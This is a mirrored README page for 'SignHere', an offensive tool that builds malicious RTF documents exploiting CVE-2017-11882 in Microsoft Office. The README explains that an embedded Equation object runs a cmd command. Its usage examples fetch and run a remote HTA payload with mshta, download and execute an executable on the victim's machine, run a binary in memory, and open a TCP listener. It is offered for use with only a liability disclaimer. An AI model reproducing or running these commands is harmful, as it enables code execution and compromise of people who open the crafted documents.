Giter VIP home page Giter VIP logo

signhere's Introduction

SignHere

Introduction

CVE-2017-11882 - The unique vulnerability identifier of Microsoft Office 2007 Service Pack 3, Microsoft Office 2010 Service Pack 2, Microsoft Office 2013 Service Pack 1, and Microsoft Office 2016 allows an attacker to run code in the context of the current user without properly handling objects in memory, the so-called "Microsoft Office Memory corruption vulnerability". The implementation includes creating a program for building malicious rtf documents and payloads in VBScript

The principle of operation

It is rtf documents that are vulnerable for the reason that they can be "programmed" by knowing special commands-RTF Headers. Thus, a binary (executable) object is created in the body of the document, in fact, it is a Microsoft Equation formula with the code that contains the cmd command. Then you can generate the payload in VBScript and use the command " mshta link to the payload file” to execute the hta file.


Attention!

Author and contributors are not responsible for any damage caused to you or by you.

Installation

The program requires Python 3 for executing.

Linux

You can use Termux, but execution of program requires root

git clone https://github.com/Retr0-code/SignHere/
cd SignHere/
chmod +x SignHere.py
./SignHere.py --help

Windows

First, you need to download the archive. Then unpack it and open a PowerShell window in this folder and write:

.\SignHere.py --help

Usage

./SignHere.py --cmd "mshta http://192.168.1.74/pay.hta" --powershell "start iexplore.exe https://github.com/Retr0-code/SignHere" --ip 192.168.1.74 --output generated.rtf

--cmd Argument with Windows command that will be executed after opening document.

--powershell Argument with powershell command that will be in VBScript payload.

--ip Argument with ip address that will be used for web-server. (default: 127.0.0.1)

--output Name and path of document.


./SignHere.py --cmd "mshta http://192.168.1.74/pay.hta" --temp exploit.exe --ip 192.168.1.74 --output generated.rtf

--temp Argument that will use binary file as payload (binary file will start in RAM memory).


./SignHere.py --cmd "mshta http://192.168.1.74/pay.hta" --payload exploit.exe --ip 192.168.1.74 --listener-host 192.168.1.74 --output generated.rtf

--payload Argument that will download file on computer of victim and execute it.

--listener-host Argument for starting TCP listener on current ip (default: 127.0.0.1)

signhere's People

Contributors

retr0-code avatar

Stargazers

avatar avatar avatar avatar avatar

Watchers

avatar

Forkers

kobbycyber

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.